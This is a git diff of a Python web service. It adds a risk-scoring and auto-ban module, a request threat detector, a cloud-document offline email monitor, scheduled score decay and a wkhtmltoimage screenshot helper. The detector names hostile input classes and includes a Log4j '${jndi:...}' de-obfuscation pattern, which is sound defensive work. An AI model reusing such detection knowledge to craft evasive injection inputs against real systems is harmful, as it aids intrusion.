) VALUES (?, ?, ?, ?, ?, ?, ?)
""",
(
threat_type_text,
score_int,
ip_text or None,
user_id_int,
path_text,
payload_text,
now_str,
),
)
update = self._update_scores(cursor, ip_text, user_id_int, score_int, now_str)
if self.auto_ban_enabled:
ip_ban_action, user_ban_action = self._get_auto_ban_actions(
cursor,
ip_text,
user_id_int,
threat_type_text,
score_int,
update,
)
conn.commit()
if not self.auto_ban_enabled:
return
if ip_ban_action and ip_text:
self.blacklist.ban_ip(
ip_text,
reason=ip_ban_action.reason,
duration_hours=ip_ban_action.duration_hours or self.auto_ban_duration_hours,
permanent=ip_ban_action.permanent,
)
if user_ban_action and user_id_int is not None:
self.blacklist._ban_user_internal(
user_id_int,
reason=user_ban_action.reason,
duration_hours=user_ban_action.duration_hours or self.auto_ban_duration_hours,
permanent=user_ban_action.permanent,
)
def decay_scores(self):
"""风险分衰减 - 定期调用,降低历史风险分"""
now = get_cst_now()
now_str = now.strftime("%Y-%m-%d %H:%M:%S")
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT ip, risk_score, updated_at, created_at FROM ip_risk_scores")
for row in cursor.fetchall():
ip = row["ip"]
current_score = int(row["risk_score"] or 0)
updated_at = row["updated_at"] or row["created_at"]
hours = self._hours_since(updated_at, now)
if hours <= 0:
continue
new_score = self._apply_hourly_decay(current_score, hours)
if new_score == current_score:
continue
cursor.execute(
"UPDATE ip_risk_scores SET risk_score = ?, updated_at = ? WHERE ip = ?",
(new_score, now_str, ip),
)
cursor.execute("SELECT user_id, risk_score, updated_at, created_at FROM user_risk_scores")
for row in cursor.fetchall():
user_id = int(row["user_id"])
current_score = int(row["risk_score"] or 0)
updated_at = row["updated_at"] or row["created_at"]
hours = self._hours_since(updated_at, now)
if hours <= 0:
continue
new_score = self._apply_hourly_decay(current_score, hours)
if new_score == current_score:
continue
cursor.execute(
"UPDATE user_risk_scores SET risk_score = ?, updated_at = ? WHERE user_id = ?",
(new_score, now_str, user_id),
)
conn.commit()
def _update_ip_score(self, ip: str, score_delta: int):
"""更新IP风险分"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return
delta = int(score_delta)
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
self._update_scores(cursor, ip_text, None, delta, now_str)
conn.commit()
def _update_user_score(self, user_id: int, score_delta: int):
"""更新用户风险分"""
if user_id is None:
return
user_id_int = int(user_id)
delta = int(score_delta)
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
self._update_scores(cursor, "", user_id_int, delta, now_str)
conn.commit()
def reset_ip_score(self, ip: str) -> bool:
"""清零指定IP的风险分"""
ip_text = str(ip or "").strip()[:64]
if not ip_text:
return False
now_str = get_cst_now_str()
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute("SELECT ip FROM ip_risk_scores WHERE ip = ?", (ip_text,))
row = cursor.fetchone()
if row:
cursor.execute(
"UPDATE ip_risk_scores SET risk_score = 0, last_seen = ?, updated_at = ? WHERE ip = ?",
(now_str, now_str, ip_text),
)
else:
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, 0, ?, ?, ?)
""",
(ip_text, now_str, now_str, now_str),
)
conn.commit()
return True
def _update_scores(
self,
cursor,
ip: str,
user_id: Optional[int],
score_delta: int,
now_str: str,
) -> _ScoreUpdateResult:
ip_score = 0
user_score = 0
if ip:
cursor.execute("SELECT risk_score FROM ip_risk_scores WHERE ip = ?", (ip,))
row = cursor.fetchone()
current = int(row["risk_score"]) if row else 0
ip_score = max(0, min(100, current + int(score_delta)))
if row:
cursor.execute(
"UPDATE ip_risk_scores SET risk_score = ?, last_seen = ?, updated_at = ? WHERE ip = ?",
(ip_score, now_str, now_str, ip),
)
else:
cursor.execute(
"""
INSERT INTO ip_risk_scores (ip, risk_score, last_seen, created_at, updated_at)
VALUES (?, ?, ?, ?, ?)
""",
(ip, ip_score, now_str, now_str, now_str),
)
if user_id is not None:
cursor.execute("SELECT risk_score FROM user_risk_scores WHERE user_id = ?", (int(user_id),))
row = cursor.fetchone()
current = int(row["risk_score"]) if row else 0
user_score = max(0, min(100, current + int(score_delta)))
if row:
cursor.execute(
"UPDATE user_risk_scores SET risk_score = ?, last_seen = ?, updated_at = ? WHERE user_id = ?",
(user_score, now_str, now_str, int(user_id)),
)
else:
cursor.execute(
"""
INSERT INTO user_risk_scores (user_id, risk_score, last_seen, created_at, updated_at)
VALUES (?, ?, ?, ?, ?)
""",
(int(user_id), user_score, now_str, now_str, now_str),
)
return _ScoreUpdateResult(ip_score=ip_score, user_score=user_score)
def _get_auto_ban_actions(
self,
cursor,
ip: str,
user_id: Optional[int],
threat_type: str,
score: int,
update: _ScoreUpdateResult,
) -> tuple[Optional["_BanAction"], Optional["_BanAction"]]:
ip_action: Optional[_BanAction] = None
user_action: Optional[_BanAction] = None
if threat_type == C.THREAT_TYPE_JNDI_INJECTION:
if ip:
ip_action = _BanAction(reason="JNDI injection detected", permanent=True)
if user_id is not None:
user_action = _BanAction(reason="JNDI injection detected", permanent=True)
return ip_action, user_action
if ip and update.ip_score >= 100:
ip_action = _BanAction(reason="Risk score reached 100", duration_hours=self.auto_ban_duration_hours)
if user_id is not None and update.user_score >= 100:
user_action = _BanAction(reason="Risk score reached 100", duration_hours=self.auto_ban_duration_hours)
if score < self.high_risk_threshold:
return ip_action, user_action
window_start = (get_cst_now() - timedelta(hours=self.high_risk_window_hours)).strftime("%Y-%m-%d %H:%M:%S")
if ip:
cursor.execute(
"""
SELECT COUNT(*) AS cnt
FROM threat_events
WHERE ip = ? AND score >= ? AND created_at >= ?
""",
(ip, int(self.high_risk_threshold), window_start),
)
row = cursor.fetchone()
cnt = int(row["cnt"]) if row else 0
if cnt >= self.high_risk_permanent_ban_count:
ip_action = _BanAction(reason="High-risk threats threshold reached", permanent=True)
if user_id is not None:
cursor.execute(
"""
SELECT COUNT(*) AS cnt
FROM threat_events
WHERE user_id = ? AND score >= ? AND created_at >= ?
""",
(int(user_id), int(self.high_risk_threshold), window_start),
)
row = cursor.fetchone()
cnt = int(row["cnt"]) if row else 0
if cnt >= self.high_risk_permanent_ban_count:
user_action = _BanAction(reason="High-risk threats threshold reached", permanent=True)
return ip_action, user_action
def _get_behavior_bonus(self, ip: str, user_id: Optional[int]) -> int:
return 0
def _hours_since(self, dt_str: Optional[str], now) -> int:
if not dt_str:
return 0
try:
dt = parse_cst_datetime(str(dt_str))
except Exception:
return 0
seconds = (now - dt).total_seconds()
if seconds <= 0:
return 0
return int(seconds // 3600)
def _apply_hourly_decay(self, score: int, hours: int) -> int:
score_int = max(0, int(score))
if score_int <= 0 or hours <= 0:
return score_int
decayed = int(math.floor(score_int * (0.9**int(hours))))
return max(0, min(100, decayed))

410
security/threat_detector.py Normal file
View File

@@ -0,0 +1,410 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from __future__ import annotations
from dataclasses import dataclass
from typing import Any, Iterable, List, Optional, Tuple
from urllib.parse import unquote_plus
from . import constants as C
@dataclass
class ThreatResult:
threat_type: str
score: int
field_name: str
rule: str = ""
matched: str = ""
value_preview: str = ""
def to_dict(self) -> dict:
return {
"threat_type": self.threat_type,
"score": int(self.score),
"field_name": self.field_name,
"rule": self.rule,
"matched": self.matched,
"value_preview": self.value_preview,
}
class ThreatDetector:
def __init__(
self,
*,
max_value_length: int = 4096,
max_decode_rounds: int = 2,
) -> None:
self.max_value_length = max(64, int(max_value_length))
self.max_decode_rounds = max(0, int(max_decode_rounds))
def scan_input(self, value: Any, field_name: str = "value") -> List[ThreatResult]:
"""扫描单个输入值(支持 dict/list 等嵌套结构)。"""
results: List[ThreatResult] = []
for sub_field, leaf in self._flatten_value(value, field_name):
text = self._stringify(leaf)
if not text:
continue
if len(text) > self.max_value_length:
text = text[: self.max_value_length]
results.extend(self._scan_text(text, sub_field))
results.sort(key=lambda r: int(r.score), reverse=True)
return results
def scan_request(self, request: Any) -> List[ThreatResult]:
"""扫描整个请求对象(兼容 Flask Request / dict 风格对象)。"""
results: List[ThreatResult] = []
for field_name, value in self._extract_request_fields(request):
results.extend(self.scan_input(value, field_name))
results.sort(key=lambda r: int(r.score), reverse=True)
return results
# ==================== Internal scanning ====================
def _scan_text(self, text: str, field_name: str) -> List[ThreatResult]:
hits: List[ThreatResult] = []
for check in [
self._check_jndi_injection,
self._check_sql_injection,
self._check_xss,
self._check_path_traversal,
self._check_command_injection,
self._check_ssrf,
self._check_xxe,
self._check_template_injection,
self._check_sensitive_path_probe,
]:
result = check(text)
if result:
threat_type, score, rule, matched = result
hits.append(
ThreatResult(
threat_type=threat_type,
score=int(score),
field_name=field_name,
rule=rule,
matched=matched,
value_preview=self._preview(text),
)
)
return hits
def _check_jndi_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
# 1) Direct match
m = C.JNDI_DIRECT_RE.search(text)
if m:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_DIRECT, "JNDI_DIRECT", m.group(0))
# 2) URL-decoded
decoded = self._multi_unquote(text)
if decoded != text:
m2 = C.JNDI_DIRECT_RE.search(decoded)
if m2:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_DIRECT, "JNDI_DIRECT_URL_DECODED", m2.group(0))
# 3) Obfuscation patterns (raw/decoded)
for candidate, rule in [(text, "JNDI_OBFUSCATED"), (decoded, "JNDI_OBFUSCATED_URL_DECODED")]:
m3 = C.JNDI_OBFUSCATED_RE.search(candidate)
if m3:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_OBFUSCATED, rule, m3.group(0))
# 4) Try limited de-obfuscation to reveal ${jndi:...}
deobf = self._deobfuscate_log4j(decoded)
if deobf and deobf != decoded:
m4 = C.JNDI_DIRECT_RE.search(deobf)
if m4:
return (C.THREAT_TYPE_JNDI_INJECTION, C.SCORE_JNDI_OBFUSCATED, "JNDI_DEOBFUSCATED", m4.group(0))
# 5) Nested expression heuristic
for candidate in [text, decoded]:
m5 = C.NESTED_EXPRESSION_RE.search(candidate)
if m5:
return (C.THREAT_TYPE_NESTED_EXPRESSION, C.SCORE_NESTED_EXPRESSION, "NESTED_EXPRESSION", m5.group(0))
return None
def _check_sql_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
candidates = [text, self._multi_unquote(text)]
for candidate in candidates:
m = C.SQLI_UNION_SELECT_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SQL_INJECTION, C.SCORE_SQL_INJECTION, "SQLI_UNION_SELECT", m.group(0))
m = C.SQLI_OR_1_EQ_1_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SQL_INJECTION, C.SCORE_SQL_INJECTION, "SQLI_OR_1_EQ_1", m.group(0))
return None
def _check_xss(self, text: str) -> Optional[Tuple[str, int, str, str]]:
candidates = [text, self._multi_unquote(text)]
for candidate in candidates:
m = C.XSS_SCRIPT_TAG_RE.search(candidate)
if m:
return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_SCRIPT_TAG", m.group(0))
m = C.XSS_JS_PROTOCOL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_JS_PROTOCOL", m.group(0))
m = C.XSS_INLINE_EVENT_HANDLER_RE.search(candidate)
if m:
return (C.THREAT_TYPE_XSS, C.SCORE_XSS, "XSS_INLINE_EVENT_HANDLER", m.group(0))
return None
def _check_path_traversal(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates = [text, decoded]
for candidate in candidates:
m = C.PATH_TRAVERSAL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_PATH_TRAVERSAL, C.SCORE_PATH_TRAVERSAL, "PATH_TRAVERSAL", m.group(0))
return None
def _check_command_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates = [text, decoded]
for candidate in candidates:
m = C.CMD_INJECTION_SUBSHELL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_COMMAND_INJECTION, C.SCORE_COMMAND_INJECTION, "CMD_SUBSHELL", m.group(0))
m = C.CMD_INJECTION_OPERATOR_WITH_CMD_RE.search(candidate)
if m:
return (C.THREAT_TYPE_COMMAND_INJECTION, C.SCORE_COMMAND_INJECTION, "CMD_OPERATOR_WITH_CMD", m.group(0))
return None
def _check_ssrf(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates: List[Tuple[str, str]] = [(text, "")]
if decoded != text:
candidates.append((decoded, "_URL_DECODED"))
for candidate, suffix in candidates:
m = C.SSRF_LOCALHOST_URL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SSRF, C.SCORE_SSRF, f"SSRF_LOCALHOST{suffix}", m.group(0))
m = C.SSRF_INTERNAL_IP_URL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SSRF, C.SCORE_SSRF, f"SSRF_INTERNAL_IP{suffix}", m.group(0))
m = C.SSRF_DANGEROUS_PROTOCOL_RE.search(candidate)
if m:
return (C.THREAT_TYPE_SSRF, C.SCORE_SSRF, f"SSRF_DANGEROUS_PROTOCOL{suffix}", m.group(0))
return None
def _check_xxe(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates: List[Tuple[str, str]] = [(text, "")]
if decoded != text:
candidates.append((decoded, "_URL_DECODED"))
for candidate, suffix in candidates:
m_doctype = C.XXE_DOCTYPE_RE.search(candidate)
if not m_doctype:
continue
m_entity = C.XXE_ENTITY_RE.search(candidate)
if not m_entity:
continue
m_sys_pub = C.XXE_SYSTEM_PUBLIC_RE.search(candidate)
if not m_sys_pub:
continue
matched = f"{m_doctype.group(0)} {m_entity.group(0)} {m_sys_pub.group(0)}"
return (C.THREAT_TYPE_XXE, C.SCORE_XXE, f"XXE_KEYWORD_COMBO{suffix}", matched)
return None
def _check_template_injection(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates: List[Tuple[str, str]] = [(text, "")]
if decoded != text:
candidates.append((decoded, "_URL_DECODED"))
for candidate, suffix in candidates:
m = C.TEMPLATE_JINJA_EXPR_RE.search(candidate)
if m:
return (C.THREAT_TYPE_TEMPLATE_INJECTION, C.SCORE_TEMPLATE_INJECTION, f"TEMPLATE_JINJA_EXPR{suffix}", m.group(0))
m = C.TEMPLATE_JINJA_STMT_RE.search(candidate)
if m:
return (C.THREAT_TYPE_TEMPLATE_INJECTION, C.SCORE_TEMPLATE_INJECTION, f"TEMPLATE_JINJA_STMT{suffix}", m.group(0))
m = C.TEMPLATE_VELOCITY_DIRECTIVE_RE.search(candidate)
if m:
return (
C.THREAT_TYPE_TEMPLATE_INJECTION,
C.SCORE_TEMPLATE_INJECTION,
f"TEMPLATE_VELOCITY_DIRECTIVE{suffix}",
m.group(0),
)
return None
def _check_sensitive_path_probe(self, text: str) -> Optional[Tuple[str, int, str, str]]:
decoded = self._multi_unquote(text)
candidates: List[Tuple[str, str]] = [(text, "")]
if decoded != text:
candidates.append((decoded, "_URL_DECODED"))
for candidate, suffix in candidates:
m = C.SENSITIVE_PATH_DOTFILES_RE.search(candidate)
if m:
return (
C.THREAT_TYPE_SENSITIVE_PATH_PROBE,
C.SCORE_SENSITIVE_PATH_PROBE,
f"SENSITIVE_PATH_DOTFILES{suffix}",
m.group(0),
)
m = C.SENSITIVE_PATH_PROBE_RE.search(candidate)
if m:
return (
C.THREAT_TYPE_SENSITIVE_PATH_PROBE,
C.SCORE_SENSITIVE_PATH_PROBE,
f"SENSITIVE_PATH_PROBE{suffix}",
m.group(0),
)
return None
# ==================== Helpers ====================
def _preview(self, text: str, limit: int = 160) -> str:
s = text.replace("\n", "\\n").replace("\r", "\\r").replace("\t", "\\t")
if len(s) <= limit:
return s
return s[: limit - 3] + "..."
def _stringify(self, value: Any) -> str:
if value is None:
return ""
if isinstance(value, bytes):
try:
return value.decode("utf-8", errors="ignore")
except Exception:
return ""
try:
return str(value)
except Exception:
return ""
def _multi_unquote(self, text: str) -> str:
s = text
for _ in range(self.max_decode_rounds):
try:
nxt = unquote_plus(s)
except Exception:
break
if nxt == s:
break
s = nxt
return s
def _deobfuscate_log4j(self, text: str) -> str:
# Replace ${...:-x} with x (including ${::-x}).
# This is intentionally conservative to reduce false positives.
import re
s = text
pattern = re.compile(r"\$\{[^{}]{0,50}:-([a-zA-Z])\}")
for _ in range(3):
nxt = pattern.sub(lambda m: m.group(1), s)
if nxt == s:
break
s = nxt
return s
def _flatten_value(self, value: Any, field_name: str) -> Iterable[Tuple[str, Any]]:
if isinstance(value, dict):
for k, v in value.items():
key = self._stringify(k) or "key"
sub_name = f"{field_name}.{key}" if field_name else key
yield from self._flatten_value(v, sub_name)
return
if isinstance(value, (list, tuple, set)):
for i, v in enumerate(value):
sub_name = f"{field_name}[{i}]"
yield from self._flatten_value(v, sub_name)
return
yield (field_name, value)
def _extract_request_fields(self, request: Any) -> List[Tuple[str, Any]]:
# dict-like input (useful for unit tests / non-Flask callers)
if isinstance(request, dict):
out: List[Tuple[str, Any]] = []
for k, v in request.items():
out.append((self._stringify(k) or "request", v))
return out
out: List[Tuple[str, Any]] = []
# path / method
for attr_name in ["method", "path", "full_path", "url", "remote_addr"]:
try:
v = getattr(request, attr_name, None)
except Exception:
v = None
if v:
out.append((attr_name, v))
# args / form (Flask MultiDict)
out.extend(self._extract_multidict(getattr(request, "args", None), "args"))
out.extend(self._extract_multidict(getattr(request, "form", None), "form"))
# headers
try:
headers = getattr(request, "headers", None)
if headers is not None:
try:
items = headers.items()
except Exception:
items = []
for k, v in items:
out.append((f"headers.{self._stringify(k)}", v))
except Exception:
pass
# cookies
try:
cookies = getattr(request, "cookies", None)
if isinstance(cookies, dict):
for k, v in cookies.items():
out.append((f"cookies.{self._stringify(k)}", v))
except Exception:
pass
# json body
data = None
try:
get_json = getattr(request, "get_json", None)
if callable(get_json):
data = get_json(silent=True)
except Exception:
data = None
if data is not None:
for name, v in self._flatten_value(data, "json"):
out.append((name, v))
return out
# raw body (as a fallback)
try:
get_data = getattr(request, "get_data", None)
if callable(get_data):
raw = get_data(cache=True, as_text=True)
if raw:
out.append(("body", raw))
except Exception:
pass
return out
def _extract_multidict(self, md: Any, prefix: str) -> List[Tuple[str, Any]]:
out: List[Tuple[str, Any]] = []
if md is None:
return out
try:
items = md.items(multi=True)
except Exception:
try:
items = md.items()
except Exception:
return out
for k, v in items:
out.append((f"{prefix}.{self._stringify(k)}", v))
return out

1494
services/kdocs_uploader.py Normal file

File diff suppressed because it is too large Load Diff

View File

@@ -4,6 +4,7 @@ from __future__ import annotations
import threading
import time
from datetime import datetime
from app_config import get_config
from app_logger import get_logger
@@ -26,6 +27,9 @@ USER_ACCOUNTS_EXPIRE_SECONDS = int(getattr(config, "USER_ACCOUNTS_EXPIRE_SECONDS
BATCH_TASK_EXPIRE_SECONDS = int(getattr(config, "BATCH_TASK_EXPIRE_SECONDS", 21600))
PENDING_RANDOM_EXPIRE_SECONDS = int(getattr(config, "PENDING_RANDOM_EXPIRE_SECONDS", 7200))
# 金山文档离线通知状态:每次掉线只通知一次,恢复在线后重置
_kdocs_offline_notified: bool = False
def cleanup_expired_data() -> None:
"""定期清理过期数据,防止内存泄漏(逻辑保持不变)。"""
@@ -91,6 +95,87 @@ def cleanup_expired_data() -> None:
logger.debug(f"已清理 {deleted_random} 个过期随机延迟任务")
def check_kdocs_online_status() -> None:
"""检测金山文档登录状态,如果离线则发送邮件通知管理员(每次掉线只通知一次)"""
global _kdocs_offline_notified
try:
import database
from services.kdocs_uploader import get_kdocs_uploader
# 获取系统配置
cfg = database.get_system_config()
if not cfg:
return
# 检查是否启用了金山文档功能
kdocs_enabled = int(cfg.get("kdocs_enabled") or 0)
if not kdocs_enabled:
return
# 检查是否启用了管理员通知
admin_notify_enabled = int(cfg.get("kdocs_admin_notify_enabled") or 0)
admin_notify_email = (cfg.get("kdocs_admin_notify_email") or "").strip()
if not admin_notify_enabled or not admin_notify_email:
return
# 获取金山文档状态
kdocs = get_kdocs_uploader()
status = kdocs.get_status()
login_required = status.get("login_required", False)
last_login_ok = status.get("last_login_ok")
# 如果需要登录或最后登录状态不是成功
is_offline = login_required or (last_login_ok is False)
if is_offline:
# 已经通知过了,不再重复通知
if _kdocs_offline_notified:
logger.debug("[KDocs监控] 金山文档离线,已通知过,跳过重复通知")
return
# 发送邮件通知
try:
import email_service
now_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
subject = "【金山文档离线告警】需要重新登录"
body = f"""
您好,
系统检测到金山文档上传功能已离线,需要重新扫码登录。
检测时间:{now_str}
状态详情:
- 需要登录:{login_required}
- 上次登录状态:{last_login_ok}
请尽快登录后台,在"系统配置""金山文档上传"中点击"获取登录二维码"重新登录。
---
此邮件由系统自动发送,请勿直接回复。
"""
email_service.send_email_async(
to_email=admin_notify_email,
subject=subject,
body=body,
email_type="kdocs_offline_alert",
)
_kdocs_offline_notified = True # 标记为已通知
logger.warning(f"[KDocs监控] 金山文档离线,已发送通知邮件到 {admin_notify_email}")
except Exception as e:
logger.error(f"[KDocs监控] 发送离线通知邮件失败: {e}")
else:
# 恢复在线,重置通知状态
if _kdocs_offline_notified:
logger.info("[KDocs监控] 金山文档已恢复在线,重置通知状态")
_kdocs_offline_notified = False
logger.debug("[KDocs监控] 金山文档状态正常")
except Exception as e:
logger.error(f"[KDocs监控] 检测失败: {e}")
def start_cleanup_scheduler() -> None:
"""启动定期清理调度器"""
@@ -106,3 +191,22 @@ def start_cleanup_scheduler() -> None:
cleanup_thread.start()
logger.info("内存清理调度器已启动")
def start_kdocs_monitor() -> None:
"""启动金山文档状态监控"""
def monitor_loop():
# 启动后等待 60 秒再开始检测(给系统初始化的时间)
time.sleep(60)
while True:
try:
check_kdocs_online_status()
time.sleep(300) # 每5分钟检测一次
except Exception as e:
logger.error(f"[KDocs监控] 监控任务执行失败: {e}")
time.sleep(60)
monitor_thread = threading.Thread(target=monitor_loop, daemon=True, name="kdocs-monitor")
monitor_thread.start()
logger.info("[KDocs监控] 金山文档状态监控已启动每5分钟检测一次")

View File

@@ -87,19 +87,32 @@ def run_scheduled_task(skip_weekday_check: bool = False) -> None:
cfg = database.get_system_config()
enable_screenshot_scheduled = cfg.get("enable_screenshot", 0) == 1
user_accounts = {}
account_ids = []
for user in approved_users:
user_id = user["id"]
accounts = safe_get_user_accounts_snapshot(user_id)
if not accounts:
load_user_accounts(user_id)
accounts = safe_get_user_accounts_snapshot(user_id)
if accounts:
user_accounts[user_id] = accounts
account_ids.extend(list(accounts.keys()))
account_statuses = database.get_account_status_batch(account_ids)
for user in approved_users:
user_id = user["id"]
accounts = user_accounts.get(user_id, {})
if not accounts:
continue
for account_id, account in accounts.items():
total_accounts += 1
if account.is_running:
continue
account_status_info = database.get_account_status(account_id)
account_status_info = account_statuses.get(str(account_id))
if account_status_info:
status = account_status_info["status"] if "status" in account_status_info.keys() else "active"
if status == "suspended":
@@ -150,6 +163,16 @@ def scheduled_task_worker() -> None:
"""定时任务工作线程"""
import schedule
def decay_risk_scores():
"""风险分衰减:每天定时执行一次"""
try:
from security.risk_scorer import RiskScorer
RiskScorer().decay_scores()
logger.info("[定时任务] 风险分衰减已执行")
except Exception as e:
logger.exception(f"[定时任务] 风险分衰减执行失败: {e}")
def cleanup_expired_captcha():
try:
deleted_count = safe_cleanup_expired_captcha()
@@ -362,7 +385,12 @@ def scheduled_task_worker() -> None:
if schedule_time_cst != str(schedule_time_raw or "").strip():
logger.warning(f"[定时任务] 系统定时时间格式无效,已回退到 {schedule_time_cst} (原值: {schedule_time_raw!r})")
signature = (schedule_enabled, schedule_time_cst)
risk_decay_time_raw = os.environ.get("RISK_SCORE_DECAY_TIME_CST", "04:00")
risk_decay_time_cst = _normalize_hhmm(risk_decay_time_raw, default="04:00")
if risk_decay_time_cst != str(risk_decay_time_raw or "").strip():
logger.warning(f"[定时任务] 风险分衰减时间格式无效,已回退到 {risk_decay_time_cst} (原值: {risk_decay_time_raw!r})")
signature = (schedule_enabled, schedule_time_cst, risk_decay_time_cst)
config_changed = schedule_state.get("signature") != signature
is_first_run = schedule_state.get("signature") is None
if (not force) and (not config_changed):
@@ -374,6 +402,8 @@ def scheduled_task_worker() -> None:
cleanup_time_cst = "03:00"
schedule.every().day.at(cleanup_time_cst).do(cleanup_old_data)
schedule.every().day.at(risk_decay_time_cst).do(decay_risk_scores)
schedule.every().hour.do(cleanup_expired_captcha)
quota_reset_time_cst = "00:00"
@@ -381,6 +411,7 @@ def scheduled_task_worker() -> None:
if is_first_run:
logger.info(f"[定时任务] 已设置数据清理任务: 每天 CST {cleanup_time_cst}")
logger.info(f"[定时任务] 已设置风险分衰减: 每天 CST {risk_decay_time_cst}")
logger.info(f"[定时任务] 已设置验证码清理任务: 每小时执行一次")
logger.info(f"[定时任务] 已设置SMTP配额重置: 每天 CST {quota_reset_time_cst}")

View File

@@ -3,15 +3,16 @@
from __future__ import annotations
import os
import shutil
import subprocess
import time
import database
import email_service
from api_browser import APIBrowser, get_cookie_jar_path, is_cookie_jar_fresh
from app_config import get_config
from app_logger import get_logger
from browser_pool_worker import get_browser_worker_pool
from playwright_automation import PlaywrightAutomation
from services.browser_manager import get_browser_manager
from services.client_log import log_to_client
from services.runtime import get_socketio
from services.state import safe_get_account, safe_remove_task_status, safe_update_task_status
@@ -24,6 +25,165 @@ config = get_config()
SCREENSHOTS_DIR = config.SCREENSHOTS_DIR
os.makedirs(SCREENSHOTS_DIR, exist_ok=True)
_WKHTMLTOIMAGE_TIMEOUT_SECONDS = int(os.environ.get("WKHTMLTOIMAGE_TIMEOUT_SECONDS", "60"))
_WKHTMLTOIMAGE_JS_DELAY_MS = int(os.environ.get("WKHTMLTOIMAGE_JS_DELAY_MS", "3000"))
_WKHTMLTOIMAGE_WIDTH = int(os.environ.get("WKHTMLTOIMAGE_WIDTH", "1920"))
_WKHTMLTOIMAGE_HEIGHT = int(os.environ.get("WKHTMLTOIMAGE_HEIGHT", "1080"))
_WKHTMLTOIMAGE_QUALITY = int(os.environ.get("WKHTMLTOIMAGE_QUALITY", "95"))
_WKHTMLTOIMAGE_ZOOM = float(os.environ.get("WKHTMLTOIMAGE_ZOOM", "1.0"))
_WKHTMLTOIMAGE_FULL_PAGE = str(os.environ.get("WKHTMLTOIMAGE_FULL_PAGE", "")).strip().lower() in (
"1",
"true",
"yes",
"on",
)
_env_crop_w = os.environ.get("WKHTMLTOIMAGE_CROP_WIDTH")
_env_crop_h = os.environ.get("WKHTMLTOIMAGE_CROP_HEIGHT")
_WKHTMLTOIMAGE_CROP_WIDTH = int(_env_crop_w) if _env_crop_w is not None else _WKHTMLTOIMAGE_WIDTH
_WKHTMLTOIMAGE_CROP_HEIGHT = (
int(_env_crop_h) if _env_crop_h is not None else (_WKHTMLTOIMAGE_HEIGHT if _WKHTMLTOIMAGE_HEIGHT > 0 else 0)
)
_WKHTMLTOIMAGE_CROP_X = int(os.environ.get("WKHTMLTOIMAGE_CROP_X", "0"))
_WKHTMLTOIMAGE_CROP_Y = int(os.environ.get("WKHTMLTOIMAGE_CROP_Y", "0"))
_WKHTMLTOIMAGE_UA = os.environ.get(
"WKHTMLTOIMAGE_USER_AGENT",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
)
def _resolve_wkhtmltoimage_path() -> str | None:
return os.environ.get("WKHTMLTOIMAGE_PATH") or shutil.which("wkhtmltoimage")
def _read_cookie_pairs(cookies_path: str) -> list[tuple[str, str]]:
if not cookies_path or not os.path.exists(cookies_path):
return []
pairs = []
try:
with open(cookies_path, "r", encoding="utf-8", errors="ignore") as f:
for line in f:
line = line.strip()
if not line or line.startswith("#"):
continue
parts = line.split("\t")
if len(parts) < 7:
continue
name = parts[5].strip()
value = parts[6].strip()
if name:
pairs.append((name, value))
except Exception:
return []
return pairs
def _select_cookie_pairs(pairs: list[tuple[str, str]]) -> list[tuple[str, str]]:
preferred_names = {"ASP.NET_SessionId", ".ASPXAUTH"}
preferred = [(name, value) for name, value in pairs if name in preferred_names and value]
if preferred:
return preferred
return [(name, value) for name, value in pairs if name and value and name.isascii() and value.isascii()]
def _ensure_login_cookies(account, proxy_config, log_callback) -> bool:
"""确保有可用的登录 cookies通过 API 登录刷新)"""
try:
with APIBrowser(log_callback=log_callback, proxy_config=proxy_config) as api_browser:
if not api_browser.login(account.username, account.password):
return False
return api_browser.save_cookies_for_screenshot(account.username)
except Exception:
return False
def take_screenshot_wkhtmltoimage(
url: str,
output_path: str,
cookies_path: str | None = None,
proxy_server: str | None = None,
run_script: str | None = None,
window_status: str | None = None,
log_callback=None,
) -> bool:
wkhtmltoimage_path = _resolve_wkhtmltoimage_path()
if not wkhtmltoimage_path:
if log_callback:
log_callback("wkhtmltoimage 未安装或不在 PATH 中")
return False
ext = os.path.splitext(output_path)[1].lower()
image_format = "jpg" if ext in (".jpg", ".jpeg") else "png"
cmd = [
wkhtmltoimage_path,
"--format",
image_format,
"--width",
str(_WKHTMLTOIMAGE_WIDTH),
"--disable-smart-width",
"--javascript-delay",
str(_WKHTMLTOIMAGE_JS_DELAY_MS),
"--load-error-handling",
"ignore",
"--enable-local-file-access",
"--encoding",
"utf-8",
]
if _WKHTMLTOIMAGE_UA:
cmd.extend(["--custom-header", "User-Agent", _WKHTMLTOIMAGE_UA, "--custom-header-propagation"])
if image_format in ("jpg", "jpeg"):
cmd.extend(["--quality", str(_WKHTMLTOIMAGE_QUALITY)])
